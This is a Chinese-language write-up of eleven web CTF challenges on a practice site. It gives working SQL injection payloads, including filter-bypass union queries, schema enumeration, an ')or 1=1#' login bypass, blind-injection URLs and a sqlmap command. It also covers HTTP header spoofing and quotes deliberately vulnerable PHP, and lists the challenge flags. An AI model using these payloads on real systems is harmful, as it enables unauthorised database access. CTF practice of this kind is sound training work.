WEB CTF 西普学院

1.菊花

                         http://ctf1.simplexue.com/web/6/  

提示: 

Please make sure you have installed .net framework 9.9!    

用burp拦截，修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)，下面的注入均在这个条件下进行
id=1 提示hacker:welcome to simplexue CTF
id=4提示hacker: don’t try again

id=0/**/ununionion/**/seselectlect/**/1,user(),database()
用户名和数据库名称:root@cuit-092a2b258a      inject

<span style="font-size:14px;">id=0/**/ununionion/**/seselectlect/**/1,username,userpapassss/**/ffromrom/**/aadmindmin/**/limit/**/0,1--</span>

simplexue: flag is SimCTF{xuectf}                                 

2.Forbidden

                          http://ctf1.simplexue.com/basic/header/

提示:

You don't have permission to access /on this server.

Make sure you are in HongKong

用burp拦截,修改为Accept-Language:zh-hk即可>KEY:123JustUserAGent

3.头有点大

                      http://ctf1.simplexue.com/web/1/index.asp?id=1

提示:

You don't have permission to access / on this server.

Make sure you are in the region of England and browsing this site with Internet Explorer

用burp拦截

修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)

       Accept-Language:en-gb

The key is:HTTpH34der

4.请输入密码

              http://ctf1.simplexue.com/basic/js/index.asp

用burp拦截

得到JAVAscript

<script type="text/javascript">
    document.οncοntextmenu=function(){return false};

    var a,b,c,d,e,f,g;
    a = 3.14;
    b = a * 2;
    c = a + b;
    d = c / b + a;
    e = c - d * b + a;
    f = e + d /c -b * a;
    g = f * e - d + c * b + a;
    a = g * g;
    a = Math.floor(a);

    function check(){
        if(document.getElementById("txt").value==a){
            return true;
        }else{
            alert("密码错误");
            return false;
        }
    }
</script>

写C算出:

#include<stdio.h>
int main()
{
    float a,b,c,d,e,f,g;
    a = 3.14;
    b = a * 2;
    c = a + b;
    d = c / b + a;
    e = c - d * b + a;
    f = e + d /c -b * a;
    g = f * e - d + c * b + a;
    a = g * g;
    printf("%f",a);
    return 0;
}

运算结果:424178.562500   输入:424178  弹出key=>  @#$JSisagoodtool@#$

5.这个看起来有点简单

              http://ctf5.simplexue.com/8/index.php?id=1

id=1'

id=1 and 1=1

id=1 and 1=2                          判断是sql注入

id=1 order by 2                       两个字节

id=1 union select 1,2               回显2

version():                                5.0.45-community-nt

database():                             my_db

user():                                    phpsql@localhost

爆数据库:

 and 1=2 union select 1,schema_name  from information_schema.schemata limit 0,1

                 information_schema     my_db

爆表:

and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1

                           news           thiskey

爆字段:

and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1

                                id        content           k0y

爆内容:

and 1=2 union select 1,k0y from thiskey

key=>           whati0MyD9ldump

6.猫抓老鼠

           http://ctf1.simplexue.com/basic/catch/          

查看http发现  Content-Row:    MTQ0ODU0MzEyNA==    填入  MTQ0ODU0MzEyNA==         =>KEY: #WWWnsf0cus_NET#

7.程序员的问题

                        http://ctf1.simplexue.com/web/4/index.php

查看源代码:

<?php


if($_POST[user] && $_POST[pass]) {
	$conn = mysql_connect("*******", "****", "****");
	mysql_select_db("****") or die("Could not select database");
	if ($conn->connect_error) {
		die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select user from php where (user='$user') and (pw='$pass')";
$query = mysql_query($sql);
if (!$query) {
	printf("Error: %s\n", mysql_error($conn));
	exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  if($row['user']=="admin") {
    echo "<p>Logged in! Key: *********** </p>";
  }

  if($row['user'] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}

?>

输入admin  提示   You are not admin!  于是想到闭合:  输入=>   ')or 1=1#    得到 Key: WWW_SIMPLEXUE_COM

8.what a fuck!这是什么鬼东西?

                             http://ctf5.simplexue.com/DUTCTF/1.html

有点晕,想到js加密,于是copy下来加上<script> </script> 弹出  Ihatejs

9.貌似有点难

                         http://ctf8.simplexue.com/phpaudit/

<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
    $cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
    $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
    $cip = $_SERVER["REMOTE_ADDR"];
else
    $cip = "0.0.0.0";
return $cip;
}

$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误！你的IP不在访问列表之内！";
}
?>
http协议:

用burp拦截   加入   X-Forwarded-For: 1.1.1.1     伪造IP为:   1.1.1.1            => Key is http_client

10.进来就给你想要的

                      http://ctf1.simplexue.com/web/1/index.asp?id=1

这题是找后台:

输入admin  查看源代码提示 =>呵呵，思路是对的哈，但是不在这儿。想想谁的权利最大

输入system     =>KEY: "!!!WellDoneBrother!"

11.看起来有点难

                  http://ctf1.simplexue.com/basic/inject/

这题是盲注题

       输入用户名:admin,密码随意,然后提交

提示:登录失败，错误的用户名和密码

然后这么玩:

     http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login

注:

ascii(str):把字符串转换为ascii码;substr(str,star,length)/substring(str,star,length):截取字符串(str字符串,star启始位置,length长度)

得到数据库:test

然后替换dabases();得到所有数据

注:这题过滤了select,用selselectect替换

用sqlmap这么来:

    sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass="  -D test --table